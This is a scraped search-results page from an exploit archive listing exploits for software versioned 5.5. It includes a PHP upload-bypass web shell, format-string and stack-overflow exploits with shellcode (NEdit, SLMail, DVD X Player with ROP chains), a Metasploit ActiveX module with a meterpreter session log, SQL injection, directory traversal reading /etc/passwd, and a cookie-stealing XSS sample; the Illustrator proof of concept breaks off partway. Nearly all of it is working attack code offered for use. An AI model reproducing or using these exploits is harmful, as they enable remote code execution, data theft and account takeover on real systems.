exploit cenros 5.5
Search result for 'exploit cenros 5.5'
(0.0498249530792 seconds)
/wwwthreads-5.5.txt ( na)
---------- Forwarded message ----------
Date: 30 Jan 2002 22:12:17 -0000
From: Root Extractor <condor@phreaker.net>
To: bugtraq@securityfocus.com
Subject: [ WWWThreads, UBBThreads ] Security Hole in upload system
[ WWWThreads, UBBThreads ] Security Hole in
upload system
Author: RootExtractor, CompuMe
condor@phreaker.net, compume2000@hotmail.com
I. Details
II. Vulnerable ver's
III. Example, Xploit
IV. Solution
Details :
..: config.inc.php :..
- ------------------------- snip ------------------------------
// $config['excludefiles']
= ".php,.asp,.js,.vbs,.sht,.htm";
$config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";
- ------------------------- snip ------------------------------
that files that were not listed in the allow files could
still be uploaded. Seems you checked the extension
but if someone added an allowable extension first
before the bogus extension the file would upload.
vulnerable :
WWWThreads and UBBThreads 5.5 Dev11 and piror
not vulnerable :
UBBThreads 5.5
Example :
you allow the upload or .txt,.jpg,.bmp,.zip
all files that don't have those extensions should not
be uploaded
However if somebody changes the name of the file to
blah.txt.php the file will validate and upload......huh !
Xploit :
1) make new file $ touch blah.txt.php
2) edit it $ vi blah.txt.php (in this step, write a php
code, for example)
<?php
$readfile = join("", file
("../config.inc.php"));
print $readfile;
?>
3) save & upload it
4) visit your blah file, now you can to see a config file
of your victim forum
5) i'm replaced readfile code by php shell file
Solution :
visit infopop.com and download ubbthreads 5.5
http://www.infopop.com/
Copyright 2002 recm security team
http://hop.to/condor
WWWThreads aka UBBThreads v5.5dev11 and below has a security hole in the upload system which allows remote users to upload php code which runs on the server. Fix available here.
Tosh/NEdit 5.5 Format String ( na)
# Exploit Title: Format string vulnerability in Nedit <= 5.5.
# Date: 04/13/2011
# Author: Tosh (The bug was already patched when I'd found the vuln)
# Email: tosh@tuxfamily.org
# Patch: http://nedit.cvs.sourceforge.net/viewvc/nedit/nedit/source/preferences.c?r1=1.159&r2=1.160&view=patch
# Version: Nedit 5.5
# Tested on: FreeBSD 8.2-RELEASE
# CVE: don't found
#!/usr/bin/perl -w
use strict;
my $exit_addr = 0x0815a86c;
my $sc =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\xb0\x3b\x50\xcd\x80";
my (@payload) = ("./nedit", "-import",
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).
"%1021\$.8x-"."%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n"
. $sc);
exec(@payload);
NEdit version 5.5 suffers from a format string vulnerability.
Inj3ct0r/Steady CMS 5.5 SQL Injection ( na)
=============================================== Steady-CmS <= 5.5 SQL Injection Vulnerabilities =============================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Site Production: http://steadycms.ru/ Product: Steady-CmS Version: 5.5 (wap-CMS) SQL-inj Throughout the script does not filter User-agent. A sample exploit: Opera/9.51 (Windows NT 5.1; U; ru)',sex='m ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]
Steady CMS versions 5.5 and below suffer from a remote SQL injection vulnerability.
Saxtor/Java Bridge 5.5 Directory Traversal ( na)
/*Title: PHP/Java Bridge 5.5
Date : Sep 6, 2010
Author: Saxtor {Location: South America (Guyana)}
Email: admin@saxtorinc.com
Category:: Web Applications
Verison: 5.5
suffers a directory traversal
vulnerability. This vulnerability could allow
attackers to read arbitrary files =>
------------------------------
http://localhost/Javabridge/source.php?source=/etc/passwd
------------------------------
*/
<?php
/**
* @param Author Saxtor Location{South America Guyana}
* @param Email: admin@saxtorinc.com
* @param Guys please dont beleive in 2012 if you are you are playing a part of getting this world to end :( its all our perception and thinking will cause invent to happen however you will be dead and alive at the same time hehe but for now hack the world! read data
*/
class Javabridgexploit
{
/**
* @param Start
*/
public function __construct($argv)
{
$this->Exploit($argv);
}
public function arguments($argv)
{
$_ARG = array();
foreach ($argv as $arg)
{
if (ereg('--[a-zA-Z0-9]*=.*', $arg))
{
$str = split("=", $arg);
$arg = '';
$key = ereg_replace("--", '', $str[0]);
for ($i = 1; $i < count($str); $i++)
{
$arg .= $str[$i];
}
$_ARG[$key] = $arg;
} elseif (ereg('-[a-zA-Z0-9]', $arg))
{
$arg = ereg_replace("-", '', $arg);
$_ARG[$arg] = 'true';
}
}
return $_ARG;
}
public function ConnectToVictim($url, $path,
$dir)
{
$link = "$url/$path/source.php?source=$dir";
$y = preg_match_all("/http:\/\//", $link,
$array);
if ($y == 1)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $link);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT,
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_REFERER,
"http://www.x.org");
$output = curl_exec($ch);
$x = preg_match_all("%:root:%", $output, $array);
$guyanarocks = $array[0][0];
if ($guyanarocks == null)
{
echo "No Data Found :(";
}
else
{
echo $output;
}
}
else {
die("Invalid Url Must Include http:// example http://php-java-bridge.sourceforge.net");
}
}
public function Exploit($argv)
{
$info = $this->arguments($argv);
$url = $info['url'];
$path = $info['path'];
$dir = $info['dir'];
if ($url == null && $path == null)
{
echo "example exploit.php --url=http://php-java-bridge.sourceforge.net --path=examples --dir=/etc/passwd";
}
$this->ConnectToVictim($url, $path, $dir);
}
}
$guyanarules = new Javabridgexploit($argv);
?>
Java Bridge version 5.5 suffers from a directory traversal vulnerability.
Tosh/NEdit 5.5 Format String Vulnerability ( bsd)
# Exploit Title: Format string vulnerability in Nedit <= 5.5.
# Date: 04/13/2011
# Author: Tosh (The bug was already patched when I'd found the vuln)
# Email: tosh@tuxfamily.org
# Patch:
http://nedit.cvs.sourceforge.net/viewvc/nedit/nedit/source/preferences.c?r1=1.159&r2=1.160&view=patch
# Version: Nedit 5.5
# Tested on: FreeBSD 8.2-RELEASE
# CVE: don't found
#!/usr/bin/perl -w
use strict;
my $exit_addr = 0x0815a86c;
my $sc =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\xb0\x3b\x50\xcd\x80";
my (@payload) = ("./nedit", "-import",
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).
"%1021\$.8x-"."%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n"
. $sc);
exec(@payload);
muts/SLMail 5.5 POP3 PASS Buffer Overflow Exploit ( windows)
#########################################################
# #
# SLmail 5.5 POP3 PASS Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the PASS command #
# #
#########################################################
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
#########################################################
# D:\Projects\BO>nc -v 192.168.1.167 4444 #
# localhost.lan [192.168.1.167] 4444 (?) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\Program Files\SLmail\System> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!"
print "\n\n###############################################"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
#Tested on Win2k SP4 Unpatched
# Change ret address if needed
buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc
try:
print "\nSending evil buffer..."
s.connect(('192.168.1.167',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nDone! Try connecting to port 4444 on victim machine."
except:
print "Could not connect to POP3!"
# milw0rm.com [2004-11-18]
Ravish/php-nuke.5.5.css.txt ( na)
PHP-Nuke is a PHP based portal management system used at thousands of sites. A Cross Site Scripting vulnerability has been discovered in the PHP-Nuke version 5.5 and prior versions. There is a function called Private Messages in PHP-Nuke by which the registered users of the site can send messages to the other registered users of site. A user can also send a HTML formatted message and can even embed JavaScript in it. Now, if the user sends a malicious JavaScript embedded message to someone then the JavaScript would be executed on the receiver's browser. -------------Sample Message---------------- You have been screwed! <script>alert(document.cookie)</script> ------------------------------------------- Thus it also allows an attacker to reveal the critical information such as cookies related to that site and get hold on his account even on admin. Get this and more at http://hackergurus.tk Regards, Ravish ravishahuja1@yahoo.com http://hackergurus.tk Hacker Gurus:: Geeks With Attitude http://hackergurus.tk Sign up now to recieve all the latest news and updates right in your mailbox.
PHP Nuke v5.5 has a cross site scripting vulnerability. Exploit information included.
bz1p/Image Viewer CP Gold 5.5 Buffer Overflow ( na)
# Image Viewer CP gold v5.5 Buffer Overflow
# Found by: bz1p (AT) bshellz.net
# Impact: Low, NOT marked safe for scripting or initializing
# CVE: ? (0day)
#
# msf exploit(image_viewer_cpgold) >
# [*] Sending exploit to 172.17.120.211:1061...
# [*] Sending stage (749056 bytes) to 172.17.120.211
# [*] Meterpreter session 1 opened (172.17.120.235:4443 -> 172.17.120.211:1064) at 2010-11-15 18:11:32 +1100
#
# msf exploit(image_viewer_cpgold) > sessions -l
#
# Active sessions
# ===============
#
# Id Type Information Connection
# -- ---- ----------- ----------
# 1 meterpreter x86/win32 VICTIMXP\victim @ VICTIM 172.17.120.235:4443 -> 172.17.120.211:1064
#
# msf exploit(image_viewer_cpgold) > sessions -i 1
# [*] Starting interaction with 1...
#
# meterpreter > shell
# Process 3536 created.
# Channel 1 created.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\victim\Desktop>
################################### Start ###################################
##
# $Id: image_viewer_cpgold.rb 10429 2010-12-03 18:46:29Z bz1p $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Image Viewer CP Gold ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in NImage Viewer CP Gold ActiveX Control 5.5. When
sending an overly long string to the Image2PDF() property of ImageViewer2.ocx
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'bz1p (0xbz1p[<AT>]gmail.com)' ],
'Version' => '$Revision: 10429 $',
'References' =>
[
[ 'CVE', '-' ],
[ 'OSVDB', '-'],
[ 'BID', '-' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x03\x04\x05\x06",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DiscoveryDate' => 'Oct 15 2010',
'DisclosureDate' => 'Dec 2 2010',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = ""
for (#{var_i} = 0; #{var_i} < 8500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.Image2PDF("lolznoaslrdepbypass", #{rand8});
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
Image Viewer CP Gold version 5.5 Image2PDF() buffer overflow exploit for the Metasploit framework.
Rew/DVD X Player 5.5 Pro Buffer Overflow ( na)
<?php
/*
Title: DVD X Player 5.5 Pro (DEP + ASLR Bypass) Exploit
Date: Sep 08, 2011
Author: Rew (rew@leethax.info)
Discovered by: Blake (http://www.exploit-db.com/exploits/17788/)
Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup.exe
Tested on: WinXP Pro SP3 + OptOut DEP
CVE: NA (0day)
DEP bypass via VirtualProtect
ASLR bypass via non-aslr module (EPG.dll)
No SafeSEH so we use the SEH @ 616 bytes
This is my very first DEP + ASLR bypassing exploit. awesomeface.jpg
If it looks clunky and rediculous, rather than hating, drop me a line
and offer some advice for improvement. irc.rizon.net#beer
Many thanks to Corelan Team for their wonderful article here...
http://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
*/
$padding_1 = str_repeat("A", 336);
// ROP till ya drop!
$rop = "\x08\xd9\x62\x61"; // push esp; sub eax, 20; pop ebx; retn
$rop .= "JUNK";
$rop .= "\x24\x01\x64\x61"; // xchg eax, ebx; retn
$rop .= "\xe2\xe4\x60\x61"; // xchg eax, ecx; add al, [eax]; add esp, 4; mov eax, esi; pop esi; retn 4
$rop .= "JUNK";
$rop .= "JUNK";
$rop .= "\x02\x67\x62\x61"; // pop eax; retn
$rop .= "JUNK";
$rop .= "\x08\x11\x01\x10"; // ptr to VirtualProtect
$rop .= "\x37\x13\x63\x61"; // pop edi; pop esi; retn
$rop .= "\x1b\x76\x61\x61"; // retn
$rop .= "\x50\x8b\x62\x61"; // jmp [eax]
$rop .= "\x3f\x85\x60\x61"; // pop ebp; retn
$rop .= "\x66\x56\x60\x61"; // add esp, 8; retn // return of VirtualProtect
$rop .= "\x50\x17\x60\x61"; // pop ebx; retn
$rop .= "\x84\xcd\x6f\x83"; // this will be added to the pointer already in edx to wrap and get 0x00000040
$rop .= "\x9e\x76\x62\x61"; // add edx, ebx; pop ebx; retn 10
$rop .= "\x01\x01\x01\x01"; // dword size // pretty big, but whatever, easier than dealing with nulls
$rop .= "\x31\x08\x62\x61"; // pushad; retn
$rop .= "JUNK";
$rop .= "JUNK";
$rop .= "JUNK";
$rop .= "JUNK";
$rop .= "JUNK";
// Couldn't find a good null-free jmp esp, so we do some more ROP to
// get esp in eax and then jmp eax to our shellcode on the stack.
$rop .= "\x08\xd9\x62\x61"; // push esp; sub eax, 20; pop ebx; retn
$rop .= "\x24\x01\x64\x61"; // xchg eax, ebx; retn
$rop .= "\xf0\x8d\x62\x61"; // add eax, 0c; retn // one more little nudge
$rop .= "\x5b\x5e\x62\x61"; // jmp eax;
$padding_2 = str_repeat("\x90", (274 - strlen($rop)));
$jmp = "\xeb\x04"; // over the pivot and into the shellcode
$pivot = "\xae\x74\x60\x61"; // add esp, 408; retn 4
// Win32 XP SP3 WinExec cmd.exe
$shellcode =
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x2F" .
"\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8" .
"\xc7\x93\xc2\x77\xff\xd0";
$exploit = $padding_1.$rop.$padding_2.$jmp.$pivot.$shellcode;
fwrite(fopen("eggsploit.plf", "w"), $exploit);
?>
DVD X Player version 5.5 PRO buffer overflow exploit with DEP and ASLR bypass.
D3r K0n!G/DVD X Player 5.5 Professional Buffer Overflow ( na)
#!/usr/bin/perl
# Exploit Title: DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow
# Date: 29/08/2011
# Author: D3r K0n!G
# Version: 5.5
# Tested on: Windows XP SP3
# CVE : N/A
# Greets to: All my friends;((Dz)& muslims)
# sec4ever.com & h4kz.net
my $file = "dvd.plf";
my $buff = "\x41" x 260;
my $ret = pack ('V',0x02AF11BC); # JMP ESP from EchoDelayProcess.dll
my $shellcode = "\x90" x 200;
# windows/exec EXITFUNC=seh CMD=calc.exe R | ruby msfencode -e x86/alpha_upper -t c
# http://www.metasploit.com
$shellcode = $shellcode . "\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34".
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41".
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58".
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30".
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52".
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b".
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50".
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c".
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54".
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b".
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c".
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31".
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47".
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54".
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e".
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30".
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51".
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51".
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45".
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50".
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56".
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a".
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c".
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38".
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b".
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d".
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d".
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53".
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43".
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35".
"\x45\x50\x41\x41";
open($FILE, ">$file");
print $FILE $buff.$ret.$shellcode;
close($FILE);
DVD X Player version 5.5 Professional universal buffer overflow exploit that creates a malicious .plf file.
Felipe Andres Manzano/Adobe Illustrator CS5.5 Memory Corruption Proof Of Concept ( na)
##########################################################################
#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com ####
##########################################################################
'''
The vulnerable function follows...
----------------------------------
.text:004A7200 ; =============== S U B R O U T I N E =======================================
.text:004A7200
.text:004A7200 ; Attributes: bp-based frame
.text:004A7200
.text:004A7200 sub_4A7200 proc near
.text:004A7200
.text:004A7200 var_11C = dword ptr -11Ch
.text:004A7200 var_118 = dword ptr -118h
.text:004A7200 var_114 = byte ptr -114h
.text:004A7200 var_14 = dword ptr -14h
.text:004A7200 var_10 = dword ptr -10h
.text:004A7200 var_C = dword ptr -0Ch
.text:004A7200 var_4 = dword ptr -4
.text:004A7200 arg_0 = dword ptr 8
.text:004A7200
.text:004A7200 push ebp
.text:004A7201 mov ebp, esp
.text:004A7203 push 0FFFFFFFFh
.text:004A7205 push offset loc_C3B8C0
.text:004A720A mov eax, large fs:0
.text:004A7210 push eax
.text:004A7211 sub esp, 110h ;Make room for a 256 bytes buffer, etc
.text:004A7217 mov eax, dword_FB3380
.text:004A721C xor eax, ebp
.text:004A721E mov [ebp+var_14], eax ;Cookie! Immediately after the buffer
.text:004A7221 push ebx
.text:004A7222 push esi
.text:004A7223 push edi
.text:004A7224 push eax
.text:004A7225 lea eax, [ebp+var_C]
.text:004A7228 mov large fs:0, eax
.text:004A722E mov [ebp+var_10], esp
.text:004A7231 mov ebx, [ebp+arg_0]
.text:004A7234 mov edi, ecx
.text:004A7236 mov ecx, ebx
.text:004A7238 mov [ebp+var_118], ebx
.text:004A723E call std::basic_string::length(...) ;Original size offending size
;(It doesn;t stop at null chars)
.text:004A7244 mov esi, eax
.text:004A7246 push esi
.text:004A7247 mov ecx, ebx
.text:004A7249 call std::basic_string::c_str(...)
.text:004A724F push eax
.text:004A7250 lea eax, [ebp+var_114]
.text:004A7256 push eax
.text:004A7257 call memcpy ;STACK OVERFLOW! (If more than 256 bytes)
.text:004A725C lea eax, [ebp+esi+var_114]
.text:004A7263 add esp, 0Ch
.text:004A7266 mov [ebp+var_11C], eax
.text:004A726C mov byte ptr [eax], 0
.text:004A726F mov [ebp+var_4], 0
.text:004A7276 lea esi, [ebp+var_114]
.text:004A727C lea esp, [esp+0]
.text:004A7280
.text:004A7280 loc_4A7280:
.text:004A7280 cmp esi, eax
.text:004A7282 jnb short loc_4A72B6
.text:004A7284 mov edx, [edi]
.text:004A7286 mov eax, [edx+4]
.text:004A7289 push esi
.text:004A728A mov ecx, edi
.text:004A728C call eax ;Iterates over the stack copied buffer
;applying a 'locale'? character translation
;(Invalid chars noted in exploit)
.text:004A728E test eax, eax
.text:004A7290 jg short loc_4A7297
.text:004A7292 mov eax, 1
.text:004A7297
.text:004A7297 loc_4A7297:
.text:004A7297 add esi, eax
.text:004A7299 mov eax, [ebp+var_11C]
.text:004A729F jmp short loc_4A7280
.text:004A72AE ; ---------------------------------------------------------------------------
.text:004A72AE
.text:004A72AE loc_4A72AE:
.text:004A72AE mov ebx, [ebp+var_118]
.text:004A72B4 jmp short loc_4A72BD
.text:004A72B6 ; ---------------------------------------------------------------------------
.text:004A72B6
.text:004A72B6 loc_4A72B6:
.text:004A72B6 mov [ebp+var_4], 0FFFFFFFFh
.text:004A72BD
.text:004A72BD loc_4A72BD:
.text:004A72BD lea ecx, [ebp+var_114]
.text:004A72C3 push ecx
.text:004A72C4 mov ecx, ebx
.text:004A72C6 call std::basic_string::operator=(...) ;Here, due to local values
;corruption it is possible to
;write a translated version of
;our buffer to anywhere
.text:004A72CC mov ecx, [ebp+var_C]
.text:004A72CF mov large fs:0, ecx
.text:004A72D6 pop ecx
.text:004A72D7 pop edi
.text:004A72D8 pop esi
.text:004A72D9 pop ebx
.text:004A72DA mov ecx, [ebp+var_14]
.text:004A72DD xor ecx, ebp
.text:004A72DF call sub_C27512 ;Check the cookie
.text:004A72E4 mov esp, ebp
.text:004A72E6 pop ebp
.text:004A72E7 retn 4
.text:004A72E7 sub_4A7200 endp
.text:004A72E7
f/
'''
#Exploit PoC begins...
from miniPDF import * #http://pastebin.com/LUTXSSvV
import zlib,struct,os,optparse,hashlib
from subprocess import Popen, PIPE
#Character translation map for the copied buffer (Reversed from function 004A72F0)
cmap=[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28,0x29,0x2A,0x2B,0x2C,0x2D,0x2E,0x2F,
